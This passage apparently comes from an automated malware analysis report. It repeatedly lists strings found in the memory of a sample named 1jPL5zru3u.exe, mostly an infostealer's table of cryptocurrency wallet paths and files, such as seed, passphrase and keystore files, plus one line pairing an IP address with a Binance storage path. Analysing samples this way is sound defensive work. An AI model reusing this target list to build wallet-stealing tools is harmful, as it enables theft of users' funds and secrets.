Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: 1jPL5zru3u.exe, 00000000.00000002.1860013089.0000000001ADC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: 1jPL5zru3u.exe, 00000000.00000002.1860013089.0000000001ADC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: 1jPL5zru3u.exe, 00000000.00000002.1860013089.0000000001ADC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: 1jPL5zru3u.exe, 00000000.00000002.1860013089.0000000001ADC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: 1jPL5zru3u.exe, 00000000.00000002.1860013089.0000000001ADC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: 1jPL5zru3u.exe, 00000000.00000002.1860013089.0000000001ADC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: 1jPL5zru3u.exe, 00000000.00000002.1860013089.0000000001ADC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: 1jPL5zru3u.exe, 00000000.00000002.1860013089.0000000001ADC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: 1jPL5zru3u.exe, 00000000.00000002.1860013089.0000000001A2D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: 77.91.77.81\user\AppData\Roaming\Binance\simple-storage.json
Source: 1jPL5zru3u.exe, 00000000.00000002.1860013089.0000000001ADC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: 1jPL5zru3u.exe, 00000000.00000002.1860013089.0000000001ADC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: 1jPL5zru3u.exe, 00000000.00000002.1860013089.0000000001ADC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: 1jPL5zru3u.exe, 00000000.00000002.1860013089.0000000001ADC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda 